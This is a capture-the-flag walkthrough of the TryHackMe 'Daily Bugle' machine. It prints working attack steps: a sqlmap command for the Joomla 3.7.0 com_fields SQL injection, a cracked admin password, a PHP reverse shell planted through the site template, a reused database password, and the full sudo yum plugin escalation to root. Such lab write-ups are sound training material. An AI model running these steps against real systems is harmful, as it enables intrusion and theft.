# Daily Bugle

IP :http://10.10.195.157/

# Task 1: 

## Recon 

Using Joomla

Nmap
`nmap -nv -Pn -sC -sV -O -T4 -oA nmap 10.10.195.157`

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 19:03 EDT
Nmap scan report for 10.10.91.23
Host is up (0.14s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds


```


Using Joomscan

```
Processing http://10.10.195.157/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
```

search for exploits. 

```
[*] exec: searchsploit joomla 3.7.0

---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                  | php/webapps/42033.txt


```

```

[+] Checking Directory Listing
[++] directory has directory listing : 
http://10.10.195.157/administrator/components
http://10.10.195.157/administrator/modules
http://10.10.195.157/administrator/templates


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://10.10.195.157/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://10.10.195.157/robots.txt 

Interesting path found from robots.txt
http://10.10.195.157/joomla/administrator/
http://10.10.195.157/administrator/
http://10.10.195.157/bin/
http://10.10.195.157/cache/
http://10.10.195.157/cli/
http://10.10.195.157/components/
http://10.10.195.157/includes/
http://10.10.195.157/installation/
http://10.10.195.157/language/
http://10.10.195.157/layouts/
http://10.10.195.157/libraries/
http://10.10.195.157/logs/
http://10.10.195.157/modules/
http://10.10.195.157/plugins/
http://10.10.195.157/tmp/



```

robots.txt

```
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

```



Using SQL Map from the exploit
```
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap: 

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]



```

run the command: 

`sqlmap -u "http://10.10.195.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]`


SQL Map results

```
19:47:27] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL')
[19:47:27] [INFO] testing for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'

```

SQL Map is having some issue getting to the URL, error connection timeout


Picked up from last time on 7/12/2021

ran a python script tto detect  1 SQL injection form 

Found a python script called Joomblah online

after runnign the script this is the results

```
[-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session


```

Copy the hash `$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm`into a text file and run john the ripper

```
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123     (?)
1g 0:00:04:07 DONE (2021-07-12 19:35) 0.004034g/s 188.9p/s 188.9c/s 188.9C/s thelma1..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed


```

log into Joomla admin page`http://10.10.91.23/administrator/index.php` with found credentials

```
jonah:spiderman123

```

There is a popup on the admin dashboard about PHP version

```

Warning
Your PHP version, 5.6.40, is only receiving security fixes at this time from the PHP project

```
we can user `php-reverse-shell` to gain access to the machine as user and root

- cOpy the content of `php-reverse-shell` to the default template of the page
- save the template
-open a netcat listener on port 4444
- click `template preview`
- get a shell

in `cd /var/www/html` > `configuration.php`

```
public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'nv5uz9r3ZEDzVjNu';
    public $db = 'joomla';
    public $dbprefix = 'fb9j5_';
    public $live_site = '';
    public $secret = 'UAMBRWzHO3oFPmVC';


```

login to `jjameson` with the password `nv5uz9r3ZEDzVjNu`

cat /home/jjamesone/user.txt for the user flag

## Priv Esc


```
sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum


```

can run `yum` without root > look on gtfobins.github.io

Follow the yum isntructions on GTFObins.github.io


```
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y


```
and we got all access
```

sudo -l
Matching Defaults entries for root on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User root may run the following commands on dailybugle:
    (ALL) ALL


```